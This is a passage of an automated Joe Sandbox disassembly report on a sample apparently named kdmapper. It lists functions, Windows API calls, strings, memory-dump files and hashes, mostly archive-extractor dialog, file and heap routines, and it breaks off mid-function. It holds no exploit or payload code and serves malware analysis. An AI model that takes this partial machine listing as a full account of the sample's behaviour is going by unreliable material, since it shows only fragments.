Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00

Part of subcall function 00DEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641,000000FF), ref: 00DEA1F1
Part of subcall function 00DEA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641), ref: 00DEA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00DE7139
CloseHandle.KERNEL32(00000000), ref: 00DE7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00DE7298

Part of subcall function 00DE9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DE73BC,?,?,?,00000000), ref: 00DE9DBC
Part of subcall function 00DE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70

Part of subcall function 00DE9620: CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,?,?,?,?,?,00E12641,000000FF), ref: 00DE963B

Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
Part of subcall function 00DEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532

Strings

SeRestorePrivilege, xrefs: 00DE6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00DE6FCC
\??\, xrefs: 00DE702B
UNC\, xrefs: 00DE7051

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 87963ab8c0e3b8e2aa06af45bc025b80a8ada989a0f3aa9709b4d3b9ce68f9be
Instruction ID: c92671f34bb36d3610a3ff5d76d4aea145b5bf24a2298f5fa84d8bda0e80bb61
Opcode Fuzzy Hash: 87963ab8c0e3b8e2aa06af45bc025b80a8ada989a0f3aa9709b4d3b9ce68f9be
Instruction Fuzzy Hash: 00C1C371904785AEDB21FB75DC41FEEB7A8EF08300F04455AFA5AE7182D770AA488B71

Function 00DEE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DEE30E

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

Part of subcall function 00DF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E21030,00000200,00DED928,00000000,?,00000050,00E21030), ref: 00DF1DC4

_strlen.LIBCMT ref: 00DEE32F
SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
GetWindowRect.USER32(?,?), ref: 00DEE3C9
GetClientRect.USER32(?,?), ref: 00DEE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00DEE475
GetWindowRect.USER32(?,?), ref: 00DEE4A2
SetWindowTextW.USER32(?,?), ref: 00DEE4DB
GetSystemMetrics.USER32(00000008), ref: 00DEE4E3
GetWindow.USER32(?,00000005), ref: 00DEE4EE
GetWindowRect.USER32(00000000,?), ref: 00DEE51B
GetWindow.USER32(00000000,00000002), ref: 00DEE58D

Strings

d, xrefs: 00DEE3F5
$%s:, xrefs: 00DEE302
CAPTION, xrefs: 00DEE4BD
t, xrefs: 00DEE34A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t
API String ID: 2407758923-369353836
Opcode ID: 0e37457aba8767a09685ecada18a0a182de460f9897c20d8455cc7e1919b779a
Instruction ID: 271e34d8069d77863f5e5ef5f52d71bf4a8af3c75d1d5bf01f5c93f5edf6fdb3
Opcode Fuzzy Hash: 0e37457aba8767a09685ecada18a0a182de460f9897c20d8455cc7e1919b779a
Instruction Fuzzy Hash: FB819271108341AFD710DF7ACD89A6FBBE9EBC9704F04091DFA84E7291D671E9098B62

Function 00E0CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00E0CB66

Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C71E
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C730
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C742
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C754
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C766
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C778
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C78A
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C79C
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7AE
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7C0
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7D2
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7E4
Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7F6

_free.LIBCMT ref: 00E0CB5B

Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4

_free.LIBCMT ref: 00E0CB7D
_free.LIBCMT ref: 00E0CB92
_free.LIBCMT ref: 00E0CB9D
_free.LIBCMT ref: 00E0CBBF
_free.LIBCMT ref: 00E0CBD2
_free.LIBCMT ref: 00E0CBE0
_free.LIBCMT ref: 00E0CBEB
_free.LIBCMT ref: 00E0CC23
_free.LIBCMT ref: 00E0CC2A
_free.LIBCMT ref: 00E0CC47
_free.LIBCMT ref: 00E0CC5F

Strings

h, xrefs: 00E0CC0E

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h
API String ID: 161543041-3415971826
Opcode ID: bff30e76095829a9f480755d62e22d7ae1088b8d7005a330e7180371573933f4
Instruction ID: 38d22fd8d5adf826c14ff3332ddb87a9549622a8436ddc911f8ca3bfe7121a49
Opcode Fuzzy Hash: bff30e76095829a9f480755d62e22d7ae1088b8d7005a330e7180371573933f4
Instruction Fuzzy Hash: 73314C316002069FEB21AB78D946B5AB7E9EF50314F247A19E599F61D2DE71ACC0CB10

Function 00E096F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E09705

Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4

_free.LIBCMT ref: 00E09711
_free.LIBCMT ref: 00E0971C
_free.LIBCMT ref: 00E09727
_free.LIBCMT ref: 00E09732
_free.LIBCMT ref: 00E0973D
_free.LIBCMT ref: 00E09748
_free.LIBCMT ref: 00E09753
_free.LIBCMT ref: 00E0975E
_free.LIBCMT ref: 00E0976C

Strings

0d, xrefs: 00E096FC

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d
API String ID: 776569668-2809447700
Opcode ID: 49fcd44588b0000a2cb4fa4564f8cec3c50be60d780f1039012c92612bcaad59
Instruction ID: 20457c8f4aa7307075a1fd43062a21000d95facd3d3b17a9eaeb7eee054fa829
Opcode Fuzzy Hash: 49fcd44588b0000a2cb4fa4564f8cec3c50be60d780f1039012c92612bcaad59
Instruction Fuzzy Hash: 8411B97612010ABFCB01EF54C942CDD3BB9EF14350B5165A1FA486F1B2DE31DE909B84

Function 00DF9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DF9736
_wcslen.LIBCMT ref: 00DF97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00DF97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DF9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF982D

Strings

</html>, xrefs: 00DF97B7
<html>, xrefs: 00DF9755, 00DF978E
utf-8"></head>, xrefs: 00DF976B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00DF9760

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 6ecf0dcc99df42da71121969dd1adc86120342b7b3d1bdfc5774cf5ee24c31ab
Instruction ID: d3a8f24468f12e1d770e2b02a12d91439683d4e4d786f02dab31a405cd902656
Opcode Fuzzy Hash: 6ecf0dcc99df42da71121969dd1adc86120342b7b3d1bdfc5774cf5ee24c31ab
Instruction Fuzzy Hash: D13139329083057ED725AF30DC06FBBB79CEF42360F15811DF601A61D2EB609A4982B6

Function 00DFD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00DFD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00DFD6ED

Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DFD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00DFD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DFD75D
DeleteObject.GDI32(00000000), ref: 00DFD764
GetWindow.USER32(00000000,00000002), ref: 00DFD76D

Strings

STATIC, xrefs: 00DFD6F3

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: d312ba22e0a892b19f60882dce751eff7b412d61fc066603b6d76f678a862bd2
Instruction ID: 2786483a56c030ee5d9ae44b54cc4b9ce4cbe5a5eae14682378c3716dd074357
Opcode Fuzzy Hash: d312ba22e0a892b19f60882dce751eff7b412d61fc066603b6d76f678a862bd2
Instruction Fuzzy Hash: 441136761003187FE221BB749C4AFBF765EEF05701F16C210FB02F6191DA648E0A42B1

Function 00E02E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E02F50
___TypeMatch.LIBVCRUNTIME ref: 00E0305E
_UnwindNestedFrames.LIBCMT ref: 00E031B0
CallUnexpected.LIBVCRUNTIME ref: 00E031CB
_abort.LIBCMT ref: 00E031D0

Strings

csm, xrefs: 00E02EDB
csm, xrefs: 00E02E6E
csm, xrefs: 00E02F87

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 9f12fe58a76100ba81327d2d4765dd2aff7b2f920d83a0fbea3560c2f58031f4
Instruction ID: 459ee51aba6c922b43f6c13af0a6a81c11146415351ba1892049cf0f435cbcdf
Opcode Fuzzy Hash: 9f12fe58a76100ba81327d2d4765dd2aff7b2f920d83a0fbea3560c2f58031f4
Instruction Fuzzy Hash: 23B19B31901209EFCF29DFA4C8859AEB7F9FF08314F14615AE9057B292C731DA92CB91

Function 00DE6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE6FAA
_wcslen.LIBCMT ref: 00DE7013
_wcslen.LIBCMT ref: 00DE7084

Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00

Strings

SeRestorePrivilege, xrefs: 00DE6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00DE6FCC
\??\, xrefs: 00DE702B
UNC\, xrefs: 00DE7051

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 61a09d563ea098400c1207138a78b20d5ecec92f96500989214ac9f22f02499d
Instruction ID: b9c56749b166ee546284d32d189b966baab450586557cec0402b7cc564ed6517
Opcode Fuzzy Hash: 61a09d563ea098400c1207138a78b20d5ecec92f96500989214ac9f22f02499d
Instruction Fuzzy Hash: ED41F4B1D083C4AAEB70FB769C82FEE77AC9F14304F045455FA55B61C2D670AA888731

Function 00DFB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

EndDialog.USER32(?,00000001), ref: 00DFB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DFB650
SetWindowTextW.USER32(?,?), ref: 00DFB661
GetDlgItem.USER32(?,00000065), ref: 00DFB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DFB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DFB694

Strings

LICENSEDLG, xrefs: 00DFB5D4

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: b1d27c7bf905a5cde48cad35b2f2d60298077257c47c5d73c02ff3edc629cc66
Instruction ID: 6597e95e67d7c91d5f52f96659d86314d9a4ae1f8200f4f782c31714973a43a4
Opcode Fuzzy Hash: b1d27c7bf905a5cde48cad35b2f2d60298077257c47c5d73c02ff3edc629cc66
Instruction Fuzzy Hash: 8E21D03664020CBFD2215F77EC49E3B7B6DEB4BB90F068015F740FA1A0CB5299069635

Function 00DFFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,32450A02,00000001,00000000,00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE14
SysAllocString.OLEAUT32(00000000), ref: 00DFFE1F
_com_issue_error.COMSUPP ref: 00DFFE48
_com_issue_error.COMSUPP ref: 00DFFE52
GetLastError.KERNEL32(80070057,32450A02,00000001,00000000,00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE57
_com_issue_error.COMSUPP ref: 00DFFE6A
GetLastError.KERNEL32(00000000,?,?,00DEAF6C,ROOT\CIMV2), ref: 00DFFE80
_com_issue_error.COMSUPP ref: 00DFFE93

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: addc33f7d92d5921b1719c92387dd6a88e185d0d93af385b894768211b59e9a9
Instruction ID: 6964f44153286013db817aa44cbe269f0ce2d21037d75ab06ea00be4082899e7
Opcode Fuzzy Hash: addc33f7d92d5921b1719c92387dd6a88e185d0d93af385b894768211b59e9a9
Instruction Fuzzy Hash: 1941C371A0021DAFDB109F69DC45BBEBBA8EF48710F15C23AFA05E7291D7349A4087B4

Function 00DEAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DEAF29

Strings

ROOT\CIMV2, xrefs: 00DEAF5C
WQL, xrefs: 00DEAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 00DEAFCA
Name, xrefs: 00DEB0B0
Windows 10, xrefs: 00DEB0C2

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: beb23acc56d9e814f682b5f1235cf6dd34f60adb1ddbdbad35f35d2271bace5f
Instruction ID: 88dad9ab196483698eabb917c6d9b1ba27c2791ae6653008e0f818d412dfb94a
Opcode Fuzzy Hash: beb23acc56d9e814f682b5f1235cf6dd34f60adb1ddbdbad35f35d2271bace5f
Instruction Fuzzy Hash: 4D716D70A00259AFDB14EFAACC959AFBBB9FF49710B044159F512B72A0CB30BD45CB60

Function 00DE9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00DE93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00DE93C9

Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2

Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1

_swprintf.LIBCMT ref: 00DE9465

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

MoveFileW.KERNEL32(?,?), ref: 00DE94D4
MoveFileW.KERNEL32(?,?), ref: 00DE9514

Strings

rtmp%d, xrefs: 00DE944E

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 2f61d455eaacfcc8dfda419c7d5a9266dce62cc83970c11f1f82ccc14d5a4365
Instruction ID: 8283f3f6fcc9a136969db0da76a98928b7d0ba522c1a0824c77958dd22021184
Opcode Fuzzy Hash: 2f61d455eaacfcc8dfda419c7d5a9266dce62cc83970c11f1f82ccc14d5a4365
Instruction Fuzzy Hash: CE418871901299AACF21FB62CC55DEEB37CEF45340F0488A5B649E3051DB388B898B74

Function 00DF1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00DF122E

Part of subcall function 00DEB146: GetVersionExW.KERNEL32(?), ref: 00DEB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00DF1251
